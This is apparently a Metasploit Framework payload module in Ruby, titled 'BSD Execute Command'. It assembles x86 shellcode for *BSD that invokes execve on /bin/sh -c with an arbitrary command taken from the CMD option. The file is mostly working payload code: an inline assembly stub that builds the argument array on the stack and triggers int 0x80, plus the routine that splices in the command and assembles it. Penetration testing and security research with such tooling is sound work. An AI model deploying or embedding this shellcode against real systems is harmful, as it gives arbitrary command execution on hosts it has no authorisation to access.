metasploit-framework/modules/payloads/singles/bsd/x86/exec.rb


##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
###
#
# Exec
# ----
#
# Executes an arbitrary command.
#
###
module Metasploit3

  include Msf::Payload::Single
  include Msf::Payload::Bsd

  #
  # Module metadata for a single-stage x86 payload targeting *BSD that runs
  # the command given in the CMD option via /bin/sh -c.
  #
  def initialize(info = {})
    super(merge_info(info,
      'Name'        => 'BSD Execute Command',
      'Version'     => '$Revision$',
      'Description' => 'Execute an arbitrary command',
      'Author'      => 'vlad902',
      'License'     => MSF_LICENSE,
      'Platform'    => 'bsd',
      'Arch'        => ARCH_X86))

    # The single required option: the command string handed to the shell.
    register_options(
      [
        OptString.new('CMD', [ true, "The command string to execute" ]),
      ], self.class)
  end

  #
  # Assembles the exec stub with the user's CMD spliced into it and returns
  # the raw shellcode bytes.
  #
  # The stub loads 0x3b (execve on *BSD) into eax, pushes "//bin/sh" and "-c"
  # onto the stack, and uses `call getstr` so the address of the inline
  # command string is pushed as the return address. ebx then points at the
  # path, ecx at the argv array, and int 0x80 performs the call. NULL bytes
  # are acceptable in this payload (see the "NULLs are fair game" comment
  # in the stub).
  #
  # Substitution is a plain regex replace of the token CMD, which appears
  # only in the `db "CMD", 0x00` directive. Only double quotes are escaped
  # before substitution; backslashes in CMD are passed through unescaped
  # and are subject to gsub's replacement-string handling of `\` sequences.
  #
  def generate_stage
    command = datastore['CMD'] || ''

    stub = <<-EOS
;;
;
; Name: single_exec
; Platforms: *BSD
; Authors: vlad902 <vlad902 [at] gmail.com>
; Version: $Revision$
; License:
;
; This file is part of the Metasploit Exploit Framework
; and is subject to the same licenses and copyrights as
; the rest of this package.
;
; Description:
;
; Execute an arbitary command.
;
;;
; NULLs are fair game.
push 0x3b
pop eax
cdq
push edx
push 0x632d
mov edi, esp
push edx
push 0x68732f6e
push 0x69622f2f
mov ebx, esp
push edx
call getstr
db "CMD", 0x00
getstr:
push edi
push ebx
mov ecx, esp
push edx
push ecx
push ebx
push eax
int 0x80
    EOS

    # Escape embedded double quotes so the db "..." directive stays intact.
    escaped = command.gsub('"', '\"')
    source  = stub.gsub(/CMD/, escaped)

    Metasm::Shellcode.assemble(Metasm::Ia32.new, source).encode_string
  end

end